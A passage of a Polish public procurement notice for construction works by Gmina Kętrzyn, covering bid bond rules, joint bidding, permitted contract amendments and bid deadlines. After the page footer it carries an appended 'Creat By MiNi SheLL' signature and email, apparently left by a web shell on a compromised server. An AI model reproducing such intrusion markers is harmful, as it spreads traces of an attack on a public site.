dnia 29.08.2021<br/>3)	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy numer 20 1160 2202 0000 0004 5328 6682.<br/>5) Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>6)	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale<br/>w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>-	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Gmina Kętrzyn, 11- 400 Kętrzyn, ul. Tadeusza Kościuszki 2<br/>-	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>-	kwotę gwarancji/poręczenia,<br/>-	termin ważności gwarancji/poręczenia,<br/>-	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>7)	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8)	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>9)	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie<br/>z pełnomocnikiem.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia,<br/>o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy wymagają, pod rygorem nieważności, zgody obu stron umowy<br/>w formie pisemnego aneksu podpisanego przez obie strony umowy i dopuszczalne są wyłącznie<br/>w granicach nienaruszających art. 455 ustawy Prawo zamówień publicznych. 2. Z<br/>zastrzeżeniem ust.1 dopuszczalne są następujące zmiany zawartej umowy: a) w zakresie<br/>wynagrodzenia wykonawcy: w przypadku zmiany przepisów obowiązujących dot. podatku VAT,<br/>wynagrodzenie brutto będzie równe dotychczasowemu wynagrodzeniu netto, powiększonemu o<br/>kwotę podatku Vat, wynikającą z zastosowania nowej stawki; b) w zakresie wynagrodzenia<br/>wykonawcy: w przypadku zmiany wysokości minimalnej stawki godzinowej, ustalonych na<br/>podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za<br/>pracę jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę, c)<br/>w zakresie wynagrodzenia wykonawcy: w przypadku zmiany zasad podlegania<br/>ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne jeżeli zmiany te będą miały wpływ na koszty wykonania<br/>zamówienia przez Wykonawcę, d) w zakresie wynagrodzenia wykonawcy: w przypadku zmiany<br/>zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa<br/>w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych – jeżeli zmiany<br/>te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę;e) w zakresie<br/>zmiany wynagrodzenia wykonawcy w przypadku zmiany cen materiałów lub kosztów związanych<br/>z realizacją (tj. wzrost lub obniżenie ceny lub kosztu dla wynagrodzenia ofertowego).<br/>Poziom zmiany cen uprawniający strony do żądania zmiany wynagrodzenia, początkowy<br/>termin ustalenia zmiany wynagrodzenia i sposób ustalenia zmiany wynagrodzenia określa<br/>podpunkt 11. f) w zakresie zmiany lub uzupełnienia dokumentacji projektowej lub specyfikacji<br/>technicznych, jeżeli jest to niezbędne dla prawidłowego wykonania przedmiotu umowy<br/>lub uzasadnione ze względów technicznych lub użytkowych.g) w zakresie zmiany terminu<br/>realizacji: - w następstwie wykraczających poza terminy określone w KPA terminów<br/>procedur administracyjnych oraz innych terminów formalno-prawnych mających wpływ na<br/>terminy wykonania przedmiotu umowy, a niewynikających z przyczyn leżących po stronie<br/>Wykonawcy –zmiana terminu wykonania o czas niezbędny na prawidłowe wykonanie<br/>przedmiotu umowy; - w przypadku zmiany przepisów prawnych istotnych dla realizacji<br/>przedmiotu umowy i mających wpływ na termin wykonania przedmiotu umowy - zmiana terminu<br/>wykonania o czas niezbędny na prawidłowe wykonanie przedmiotu umowy; - w przypadku<br/>wprowadzenia zmian w stosunku do dokumentacji projektowej lub specyfikacji technicznych,będących podstawą realizacji przedmiotu umowy, jeżeli wprowadzenie zmian wpływa na termin<br/>wykonania przedmiotu umowy - zmiana terminu wykonania o czas niezbędny na prawidłowe<br/>wykonanie przedmiotu umowy; - w przypadku działania siły wyższej (zdarzenie zewnętrzne,<br/>niemożliwe do przewidzenia i niemożliwe do zapobieżenia), mającej bezpośredni wpływ na<br/>terminowość wykonania robót -zmiana terminu wykonania o czas działania siły wyższej; w takiej<br/>sytuacji wykonawca jest obowiązany zabezpieczyć teren budowy przed niepożądanym jej dz ...<br/>cd. w załączniku do SWZ Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-30 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-29</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com